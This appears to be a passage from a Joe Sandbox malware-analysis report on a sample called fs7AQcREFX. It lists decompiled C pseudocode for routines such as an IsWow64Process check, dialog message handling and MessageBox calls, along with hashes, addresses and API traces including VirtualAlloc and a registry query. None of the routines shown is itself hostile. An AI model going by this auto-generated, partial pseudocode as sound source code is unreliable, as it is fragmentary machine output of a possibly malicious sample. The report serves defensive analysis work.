                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Messagelstrcatlstrcpy$SendTextWindowlstrlen$LoadParentStringwsprintf
                                                                                                                                                                                                                                                                                          • String ID: Untitled
                                                                                                                                                                                                                                                                                          • API String ID: 3036718229-1345941684
                                                                                                                                                                                                                                                                                          • Opcode ID: 9d28b6b0157c30828490a4ac012aa1bc71df5ade0e085783447e642352434e3e
                                                                                                                                                                                                                                                                                          • Instruction ID: beb8b888c58aa5ef9139c48f413b250ca23cdacee4f315b6f5f19cfbb00c2536
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d28b6b0157c30828490a4ac012aa1bc71df5ade0e085783447e642352434e3e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F08C723406057FD618A7B4DD89FE6F368BF88711F008220B31496490DFB4B89487A4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E04009290() {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x04009296
                                                                                                                                                                                                                                                                                          0x040092b4
                                                                                                                                                                                                                                                                                          0x040092bb
                                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                                          0x040092d1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                                          • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                                          • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                          			E000F5580(void* __edi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed short* _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                                                                                                          				unsigned int _t48;
                                                                                                                                                                                                                                                                                          				signed int* _t62;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t73;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed short* _t85;
                                                                                                                                                                                                                                                                                          				int _t87;
                                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t92;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t95;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t90 = _a4;
                                                                                                                                                                                                                                                                                          				if(( *(_t90 + 0x14) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          					_t62 =  *(_t90 + 0x10);
                                                                                                                                                                                                                                                                                          					_t85 =  *(_t90 + 0xc);
                                                                                                                                                                                                                                                                                          					_v12 = _t85;
                                                                                                                                                                                                                                                                                          					if(_t62 != 0) {
                                                                                                                                                                                                                                                                                          						if( *_t85 == 0xffff) {
                                                                                                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                                                                                                          							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x0000fff7;
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								_t77 = 0;
                                                                                                                                                                                                                                                                                          								_v8 = 0;
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_t90 + 4)) <= 0) {
                                                                                                                                                                                                                                                                                          									goto L13;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									while(_t77 >= 0 && _t77 <  *((intOrPtr*)(_t90 + 4))) {
                                                                                                                                                                                                                                                                                          										_t72 =  *_t90;
                                                                                                                                                                                                                                                                                          										_t73 = _t72 + _t77 * 8;
                                                                                                                                                                                                                                                                                          										if( *((short*)(_t72 + 4 + _t77 * 8)) == 8) {
                                                                                                                                                                                                                                                                                          											_t48 =  *_t62 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											if((_t48 & 0x00000008) != 0 && (_t85[1] & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          												_t87 =  *_t85 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          												_t95 =  *_t73;
                                                                                                                                                                                                                                                                                          												SendMessageA(_t95, 0x401, _t87,  !(_t48 >> 8) & 0x00000001);
                                                                                                                                                                                                                                                                                          												SendMessageA(_t95, 0x402, _t87, ( *_t62 & 0x0000ffff) >> 0x00000009 & 0x00000001);
                                                                                                                                                                                                                                                                                          												SendMessageA(_t95, 0x405, _t87, ( *_t62 & 0x0000ffff) >> 0x0000000a & 0x00000001);
                                                                                                                                                                                                                                                                                          												SendMessageA(_t95, 0x403, _t87, ( *_t62 & 0x0000ffff) >> 0x0000000b & 0x00000001);
                                                                                                                                                                                                                                                                                          												_t77 = _v8;
                                                                                                                                                                                                                                                                                          												_t85 = _v12;
                                                                                                                                                                                                                                                                                          												_t90 = _a4;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t77 = _t77 + 1;
                                                                                                                                                                                                                                                                                          										_v8 = _t77;
                                                                                                                                                                                                                                                                                          										if(_t77 <  *((intOrPtr*)(_t90 + 4))) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L13;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                                                                                                          									if(_v16 == 0x110) {
                                                                                                                                                                                                                                                                                          										_push(_t62);
                                                                                                                                                                                                                                                                                          										_push(_t90);
                                                                                                                                                                                                                                                                                          										_t92 = E000F47C0();
                                                                                                                                                                                                                                                                                          										_t41 = E001042F0(_v0, _t92);
                                                                                                                                                                                                                                                                                          										if(_t41 != 0) {
                                                                                                                                                                                                                                                                                          											_a4 = 0;
                                                                                                                                                                                                                                                                                          											_t44 =  *((intOrPtr*)( *((intOrPtr*)( *_t92))))( *((intOrPtr*)(_t92 + 4)), 0x110, _a8, _a12,  &_a4, 0);
                                                                                                                                                                                                                                                                                          											asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          											return  ~_t44 & _a4;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											return _t41;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										return 0;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                                                                                          								 *_t62 =  *_t62 & 0x0000fff7;
                                                                                                                                                                                                                                                                                          								_t85 =  &(_t85[2]);
                                                                                                                                                                                                                                                                                          								_t62 =  &(_t62[2]);
                                                                                                                                                                                                                                                                                          								_v12 = _t85;
                                                                                                                                                                                                                                                                                          							} while ( *_t85 != 0xffff);
                                                                                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L21:
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x000f5587
                                                                                                                                                                                                                                                                                          0x000f558e
                                                                                                                                                                                                                                                                                          0x000f559d
                                                                                                                                                                                                                                                                                          0x000f55a1
                                                                                                                                                                                                                                                                                          0x000f55a4
                                                                                                                                                                                                                                                                                          0x000f55a9
                                                                                                                                                                                                                                                                                          0x000f55be
                                                                                                                                                                                                                                                                                          0x000f5692
                                                                                                                                                                                                                                                                                          0x000f5698
                                                                                                                                                                                                                                                                                          0x000f56a6
                                                                                                                                                                                                                                                                                          0x000f55c4
                                                                                                                                                                                                                                                                                          0x000f55c4
                                                                                                                                                                                                                                                                                          0x000f55c4
                                                                                                                                                                                                                                                                                          0x000f55c6
                                                                                                                                                                                                                                                                                          0x000f55cc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f55d2
                                                                                                                                                                                                                                                                                          0x000f55d2
                                                                                                                                                                                                                                                                                          0x000f55e3
                                                                                                                                                                                                                                                                                          0x000f55eb
                                                                                                                                                                                                                                                                                          0x000f55ee
                                                                                                                                                                                                                                                                                          0x000f55f0
                                                                                                                                                                                                                                                                                          0x000f55f5
                                                                                                                                                                                                                                                                                          0x000f55fd
                                                                                                                                                                                                                                                                                          0x000f5600
                                                                                                                                                                                                                                                                                          0x000f5612
                                                                                                                                                                                                                                                                                          0x000f5629
                                                                                                                                                                                                                                                                                          0x000f5640
                                                                                                                                                                                                                                                                                          0x000f5657
                                                                                                                                                                                                                                                                                          0x000f565d
                                                                                                                                                                                                                                                                                          0x000f5660
                                                                                                                                                                                                                                                                                          0x000f5663
                                                                                                                                                                                                                                                                                          0x000f5663
                                                                                                                                                                                                                                                                                          0x000f55f5
                                                                                                                                                                                                                                                                                          0x000f5666
                                                                                                                                                                                                                                                                                          0x000f5667
                                                                                                                                                                                                                                                                                          0x000f566d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f566d
                                                                                                                                                                                                                                                                                          0x000f56b4
                                                                                                                                                                                                                                                                                          0x000f56ba
                                                                                                                                                                                                                                                                                          0x000f56bb
                                                                                                                                                                                                                                                                                          0x000f56bc
                                                                                                                                                                                                                                                                                          0x000f56bd
                                                                                                                                                                                                                                                                                          0x000f56be
                                                                                                                                                                                                                                                                                          0x000f56bf
                                                                                                                                                                                                                                                                                          0x000f56ca
                                                                                                                                                                                                                                                                                          0x000f56d2
                                                                                                                                                                                                                                                                                          0x000f56d3
                                                                                                                                                                                                                                                                                          0x000f56dc
                                                                                                                                                                                                                                                                                          0x000f56de
                                                                                                                                                                                                                                                                                          0x000f56e5
                                                                                                                                                                                                                                                                                          0x000f56fb
                                                                                                                                                                                                                                                                                          0x000f5711
                                                                                                                                                                                                                                                                                          0x000f5715
                                                                                                                                                                                                                                                                                          0x000f571d
                                                                                                                                                                                                                                                                                          0x000f56e7
                                                                                                                                                                                                                                                                                          0x000f56ea
                                                                                                                                                                                                                                                                                          0x000f56ea
                                                                                                                                                                                                                                                                                          0x000f56cc
                                                                                                                                                                                                                                                                                          0x000f56cf
                                                                                                                                                                                                                                                                                          0x000f56cf
                                                                                                                                                                                                                                                                                          0x000f56ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5673
                                                                                                                                                                                                                                                                                          0x000f5678
                                                                                                                                                                                                                                                                                          0x000f567b
                                                                                                                                                                                                                                                                                          0x000f5683
                                                                                                                                                                                                                                                                                          0x000f5686
                                                                                                                                                                                                                                                                                          0x000f5689
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f55c4
                                                                                                                                                                                                                                                                                          0x000f55ab
                                                                                                                                                                                                                                                                                          0x000f55b3
                                                                                                                                                                                                                                                                                          0x000f55b3
                                                                                                                                                                                                                                                                                          0x000f5590
                                                                                                                                                                                                                                                                                          0x000f5599
                                                                                                                                                                                                                                                                                          0x000f5599
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 53a0865f752537a6047fe4d1671749263c1f64f4a94abd6b98281262c8690a9e
                                                                                                                                                                                                                                                                                          • Instruction ID: 532739343c71584feb6cbfd6b2028ca0aa0092aede5a9b681e8722a83484c1f3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53a0865f752537a6047fe4d1671749263c1f64f4a94abd6b98281262c8690a9e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B041E072610618ABDB24CF05EC80FB6B3E9FF94711F10C12AFB509BA80D7B5A951D7A0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                                                                                          			E00103810(intOrPtr* __ecx, char _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				CHAR* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          				long _t35;
                                                                                                                                                                                                                                                                                          				CHAR** _t39;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				CHAR** _t51;
                                                                                                                                                                                                                                                                                          				CHAR* _t66;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t75;
                                                                                                                                                                                                                                                                                          				CHAR* _t77;
                                                                                                                                                                                                                                                                                          				LONG* _t78;
                                                                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F3E0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t81 = _t80 - 8;
                                                                                                                                                                                                                                                                                          				_t28 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t28 ^ _t79);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t75 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                          					_t72 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t2 = _t75 - 0x24; // 0x0
                                                                                                                                                                                                                                                                                          					_t72 = _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00103C60( &_v24, 2);
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t57 = _v24;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v24 - 8)) <= 0) {
                                                                                                                                                                                                                                                                                          					MessageBeep(0x10);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t66 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          					_v20 = _t66;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					E000F58F0( &_v20, _t57, _a4);
                                                                                                                                                                                                                                                                                          					_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                                          					_push(3);
                                                                                                                                                                                                                                                                                          					if( *_t75 == 0) {
                                                                                                                                                                                                                                                                                          						_push( &_a4);
                                                                                                                                                                                                                                                                                          						_t39 = E00103C60();
                                                                                                                                                                                                                                                                                          						_t77 = _v20;
                                                                                                                                                                                                                                                                                          						MessageBoxA( *(_t72 + 4), _t77,  *_t39, 0x40);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_push( &_a4);
                                                                                                                                                                                                                                                                                          						_t51 = E00103C60();
                                                                                                                                                                                                                                                                                          						_t77 = _v20;
                                                                                                                                                                                                                                                                                          						MessageBoxA( *( *_t75 + 4), _t77,  *_t51, 0x40);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t43 = _a4;
                                                                                                                                                                                                                                                                                          					_t18 = _t43 - 0xc; // -11
                                                                                                                                                                                                                                                                                          					if(_t18 != 0x15ad20 && InterlockedDecrement(_t43 + 0xfffffff4) <= 0) {
                                                                                                                                                                                                                                                                                          						_push(_a4 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						E001062C2();
                                                                                                                                                                                                                                                                                          						_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					if(_t77 - 0xc != 0x15ad20) {
                                                                                                                                                                                                                                                                                          						_t78 =  &(_t77[0xfffffffffffffff4]);
                                                                                                                                                                                                                                                                                          						if(InterlockedDecrement(_t78) <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t78);
                                                                                                                                                                                                                                                                                          							E001062C2();
                                                                                                                                                                                                                                                                                          							_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t35 = _v24;
                                                                                                                                                                                                                                                                                          				if(_t35 - 0xc != 0x15ad20) {
                                                                                                                                                                                                                                                                                          					_t35 = InterlockedDecrement(_t35 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          					if(_t35 <= 0) {
                                                                                                                                                                                                                                                                                          						_push(_v24 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						_t35 = E001062C2();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t35;
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x00103813
                                                                                                                                                                                                                                                                                          0x00103815
                                                                                                                                                                                                                                                                                          0x00103820
                                                                                                                                                                                                                                                                                          0x00103821
                                                                                                                                                                                                                                                                                          0x00103827
                                                                                                                                                                                                                                                                                          0x0010382e
                                                                                                                                                                                                                                                                                          0x00103832
                                                                                                                                                                                                                                                                                          0x00103838
                                                                                                                                                                                                                                                                                          0x0010383c
                                                                                                                                                                                                                                                                                          0x00103843
                                                                                                                                                                                                                                                                                          0x0010383e
                                                                                                                                                                                                                                                                                          0x0010383e
                                                                                                                                                                                                                                                                                          0x0010383e
                                                                                                                                                                                                                                                                                          0x0010383e
                                                                                                                                                                                                                                                                                          0x0010384b
                                                                                                                                                                                                                                                                                          0x00103850
                                                                                                                                                                                                                                                                                          0x00103857
                                                                                                                                                                                                                                                                                          0x00103865
                                                                                                                                                                                                                                                                                          0x00103912
                                                                                                                                                                                                                                                                                          0x0010386b
                                                                                                                                                                                                                                                                                          0x0010386b
                                                                                                                                                                                                                                                                                          0x00103871
                                                                                                                                                                                                                                                                                          0x00103874
                                                                                                                                                                                                                                                                                          0x00103880
                                                                                                                                                                                                                                                                                          0x00103885
                                                                                                                                                                                                                                                                                          0x0010388b
                                                                                                                                                                                                                                                                                          0x0010388d
                                                                                                                                                                                                                                                                                          0x001038ac
                                                                                                                                                                                                                                                                                          0x001038ad
                                                                                                                                                                                                                                                                                          0x001038b4
                                                                                                                                                                                                                                                                                          0x001038bf
                                                                                                                                                                                                                                                                                          0x0010388f
                                                                                                                                                                                                                                                                                          0x00103892
                                                                                                                                                                                                                                                                                          0x00103893
                                                                                                                                                                                                                                                                                          0x0010389c
                                                                                                                                                                                                                                                                                          0x001038bf
                                                                                                                                                                                                                                                                                          0x001038bf
                                                                                                                                                                                                                                                                                          0x001038c5
                                                                                                                                                                                                                                                                                          0x001038c8
                                                                                                                                                                                                                                                                                          0x001038d1
                                                                                                                                                                                                                                                                                          0x001038e3
                                                                                                                                                                                                                                                                                          0x001038e4
                                                                                                                                                                                                                                                                                          0x001038e9
                                                                                                                                                                                                                                                                                          0x001038e9
                                                                                                                                                                                                                                                                                          0x001038ef
                                                                                                                                                                                                                                                                                          0x001038f9
                                                                                                                                                                                                                                                                                          0x001038fb
                                                                                                                                                                                                                                                                                          0x00103903
                                                                                                                                                                                                                                                                                          0x00103905
                                                                                                                                                                                                                                                                                          0x00103906
                                                                                                                                                                                                                                                                                          0x0010390b
                                                                                                                                                                                                                                                                                          0x0010390b
                                                                                                                                                                                                                                                                                          0x00103903
                                                                                                                                                                                                                                                                                          0x001038f9
                                                                                                                                                                                                                                                                                          0x00103918
                                                                                                                                                                                                                                                                                          0x0010391f
                                                                                                                                                                                                                                                                                          0x0010392b
                                                                                                                                                                                                                                                                                          0x00103931
                                                                                                                                                                                                                                                                                          0x00103935
                                                                                                                                                                                                                                                                                          0x0010393d
                                                                                                                                                                                                                                                                                          0x0010393e
                                                                                                                                                                                                                                                                                          0x00103943
                                                                                                                                                                                                                                                                                          0x00103935
                                                                                                                                                                                                                                                                                          0x00103949
                                                                                                                                                                                                                                                                                          0x00103957

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 001038BF
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(-000000F3), ref: 001038D7
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 001038FF
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000010), ref: 00103912
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00103931
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DecrementInterlocked$Message$Beep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3609174286-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ff4b55a7ba62ef6ceead918bcc59b1fd6a2a44c96ec9af65a1d1c606f552b262
                                                                                                                                                                                                                                                                                          • Instruction ID: 5edeac4c1ad007d3cba459e36b76ee3131633b828ecaca37c787482f087ec18e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4b55a7ba62ef6ceead918bcc59b1fd6a2a44c96ec9af65a1d1c606f552b262
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D41B572904609EBD714DB68CC85B9AB77CEF14324F108719F961A72D0D7B0AF04C791
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 0252916A
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252BBC7: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000000), ref: 0252BC23
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252BBC7: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0252BC47
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252BBC7: RegCloseKey.ADVAPI32(00000000), ref: 0252BC5B
